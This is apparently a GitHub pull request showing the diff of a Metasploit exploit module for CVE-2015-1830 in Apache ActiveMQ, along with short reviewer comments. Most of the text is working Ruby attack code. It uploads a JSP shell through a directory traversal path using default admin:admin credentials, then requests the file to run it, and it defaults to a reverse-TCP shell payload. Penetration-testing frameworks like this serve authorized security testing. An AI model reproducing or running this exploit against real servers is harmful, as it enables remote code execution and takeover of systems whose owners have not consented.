-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add apache_activemq_traversal_upload module to /modules/exploits/windows/http/ #12910
Changes from 1 commit
20386f1
2360b0e
cd6c01a
a87a1ae
6338994
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,20 +4,25 @@ | |
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = NormalRanking | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Apache ActiveMQ directory traversal shell upload', | ||
'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload', | ||
'Description' => %q{ | ||
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell. | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. @kalba-security If you could just split this description up a bit I think that's the last thing and then I'd be good to land it There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Done! @dwelch-r7 |
||
}, | ||
'Author' => 'Erik Wynter', #@wyntererik | ||
'Author' => | ||
[ | ||
'David Jorm', # Discovery and exploit | ||
'Erik Wynter' # @wyntererik - Metasploit | ||
], | ||
'References' => | ||
[ | ||
[ 'CVE', '2015-1830' ], | ||
[ 'EDB', '40857'], | ||
[ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ] | ||
], | ||
'Privileged' => false, | ||
|
@@ -33,24 +38,27 @@ def initialize(info = {}) | |
], | ||
'DisclosureDate' => 'Aug 19 2015', | ||
'License' => MSF_LICENSE, | ||
'DefaultOptions' => { | ||
'RPORT' => 8161, | ||
'PAYLOAD' => 'java/jsp_shell_reverse_tcp' | ||
}, | ||
'DefaultTarget' => 0)) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), | ||
OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']), | ||
Opt::RPORT(8161), | ||
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), | ||
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']) | ||
]) | ||
end | ||
|
||
def check | ||
print_status("loaded check") | ||
testurl = Rex::Text::rand_text_alpha(10) | ||
def check | ||
print_status("Running check...") | ||
testfile = Rex::Text::rand_text_alpha(10) | ||
testcontent = Rex::Text::rand_text_alpha(10) | ||
|
||
send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"), | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -59,7 +67,7 @@ def check | |
}) | ||
|
||
res1 = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -69,7 +77,7 @@ def check | |
if res1 && res1.body.include?(testcontent) | ||
send_request_cgi( | ||
opts = { | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -85,11 +93,11 @@ def check | |
|
||
def exploit | ||
print_status("Uploading payload...") | ||
testurl = Rex::Text::rand_text_alpha(10) | ||
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testurl}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. | ||
testfile = Rex::Text::rand_text_alpha(10) | ||
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testurl}.jsp"), | ||
send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
|
@@ -98,14 +106,14 @@ def exploit | |
}) | ||
|
||
print_status("Payload sent. Attempting to execute the payload.") | ||
res1 = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"), | ||
res = send_request_cgi({ | ||
'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), | ||
'headers' => { | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) | ||
}, | ||
'method' => 'GET' | ||
}) | ||
if res1 && res1.code == 200 | ||
if res && res.code == 200 | ||
print_good("Payload executed!") | ||
else | ||
fail_with(Failure::PayloadFailed, "Failed to execute the payload") | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It might be unclear to a reader as to what these options actually do. Add a short description to each option (as well as state the default value).